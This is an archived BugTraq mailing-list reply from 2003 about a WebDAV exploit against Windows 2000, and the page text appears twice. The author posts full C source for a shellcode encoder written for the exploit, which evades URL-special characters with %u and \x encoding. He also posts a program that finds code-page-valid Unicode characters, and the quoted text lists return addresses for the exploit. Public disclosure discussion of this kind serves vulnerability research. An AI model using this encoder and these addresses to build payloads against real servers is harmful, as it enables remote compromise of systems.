BugTraq
Back to list
|
Post reply
Re: WebDAV exploit: using wide character decoder scheme
Mar 27 2003 01:47AM
JW Oh (mat monkey org)
In-Reply-To: <20030326111443.6fb287a3.dave (at) immunitysec (dot) com [email concealed]>
>
>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<
I tested it only on Korean version of Windows(Server and Professional
edition).
>
>This exploit must be much easier to get reliable on other language
>versions. A shame, really.
Shame???
>
>Did you use my encoder or did you write your shellcode manually, just
>out of curiosity?
The encoding scheme is so simple.
This is the shellcode encoder.
---------------------------------
/*
mat (at) monkey (dot) org [email concealed]
mat (at) panicsecurity (dot) org [email concealed]
Shellcode encoder for webdav exploit.
*/
#include <stdio.h>
int is_special(unsigned char num1)
{
return (num1==0x3a || num1==0x26 || num1==0x3f || num1==0x25 ||
num1==0x23 || num1==0x20 || num1==0xa || num1==0xd || num1==0x2f ||
num1==0x2b || num1==0xb || num1==0x5c);
}
void main()
{
int debug=0;
int rc;
unsigned char buffer[512];
while(rc=read(0,buffer,sizeof(buffer)))
{
int i;
for(i=0;i<rc;i++)
{
unsigned int num1=(buffer[i]/2)&0xff;
unsigned int num2=(buffer[i]/2)&0xff;
if(buffer[i]%2==1)
{
num2++;
}
while(is_special(num1) || is_special(num2))
{
num1++;
num2--;
if(num2==0)
{
printf("error!\n");
}
}
if(buffer[i]==-1)//0xff)
{
num2=0x2a;
if(debug)
{
printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
}
printf("%%u11d5\\x%.2x",num2);
}else if(buffer[i]==1)
{
printf("%%u0411%%u00f0");
}else{
if(debug)
{
printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
}
printf("\\x%.2x\\x%.2x",num1,num2);
}
}
}
}
---------------------------------
And this is the code for finding valid unicode characters on my system.
---------------------------------
#include <windows.h>
#include <lm.h>
#include <stdio.h>
int main(int argc, char* argv[])
{
unsigned char i;
unsigned char j;
for(i=0;i<255;i++)
{
for(j=0;j<255;j++)
{
char string_to_copy[3];
WCHAR src[256]={0,};
char dest[256]={0,};
string_to_copy[0]=i;
string_to_copy[1]=j;
string_to_copy[2]=0;
memcpy(src,string_to_copy,strlen(string_to_copy));
BOOL lpUsedDefaultChar;
WideCharToMultiByte
(CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar);
if(!lpUsedDefaultChar)
{
printf("%.2x%.2x\n",j,i);
}
}
}
return 0;
}
---------------------------------
>
>Dave Aitel
>Advanced Engineering Directorate
>Immunity, Inc.
>http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the
>movies."
>
>On Wed, 26 Mar 2003 22:55:12 +0900
>¿ÀÁ¤¿í <mat (at) panicsecurity (dot) org [email concealed]> wrote:
>> my @return_addresses=(
>> "%u32ac%u77e2",
>> "%uc1b5%u76ae",
>> "%u005d%u77a5",
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
>
>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<
I tested it only on Korean version of Windows(Server and Professional
edition).
>
>This exploit must be much easier to get reliable on other language
>versions. A shame, really.
Shame???
>
>Did you use my encoder or did you write your shellcode manually, just
>out of curiosity?
The encoding scheme is so simple.
This is the shellcode encoder.
---------------------------------
/*
mat (at) monkey (dot) org [email concealed]
mat (at) panicsecurity (dot) org [email concealed]
Shellcode encoder for webdav exploit.
*/
#include <stdio.h>
int is_special(unsigned char num1)
{
return (num1==0x3a || num1==0x26 || num1==0x3f || num1==0x25 ||
num1==0x23 || num1==0x20 || num1==0xa || num1==0xd || num1==0x2f ||
num1==0x2b || num1==0xb || num1==0x5c);
}
void main()
{
int debug=0;
int rc;
unsigned char buffer[512];
while(rc=read(0,buffer,sizeof(buffer)))
{
int i;
for(i=0;i<rc;i++)
{
unsigned int num1=(buffer[i]/2)&0xff;
unsigned int num2=(buffer[i]/2)&0xff;
if(buffer[i]%2==1)
{
num2++;
}
while(is_special(num1) || is_special(num2))
{
num1++;
num2--;
if(num2==0)
{
printf("error!\n");
}
}
if(buffer[i]==-1)//0xff)
{
num2=0x2a;
if(debug)
{
printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
}
printf("%%u11d5\\x%.2x",num2);
}else if(buffer[i]==1)
{
printf("%%u0411%%u00f0");
}else{
if(debug)
{
printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
}
printf("\\x%.2x\\x%.2x",num1,num2);
}
}
}
}
---------------------------------
And this is the code for finding valid unicode characters on my system.
---------------------------------
#include <windows.h>
#include <lm.h>
#include <stdio.h>
int main(int argc, char* argv[])
{
unsigned char i;
unsigned char j;
for(i=0;i<255;i++)
{
for(j=0;j<255;j++)
{
char string_to_copy[3];
WCHAR src[256]={0,};
char dest[256]={0,};
string_to_copy[0]=i;
string_to_copy[1]=j;
string_to_copy[2]=0;
memcpy(src,string_to_copy,strlen(string_to_copy));
BOOL lpUsedDefaultChar;
WideCharToMultiByte
(CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar);
if(!lpUsedDefaultChar)
{
printf("%.2x%.2x\n",j,i);
}
}
}
return 0;
}
---------------------------------
>
>Dave Aitel
>Advanced Engineering Directorate
>Immunity, Inc.
>http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the
>movies."
>
>On Wed, 26 Mar 2003 22:55:12 +0900
>¿ÀÁ¤¿í <mat (at) panicsecurity (dot) org [email concealed]> wrote:
>> my @return_addresses=(
>> "%u32ac%u77e2",
>> "%uc1b5%u76ae",
>> "%u005d%u77a5",
>
[ reply ]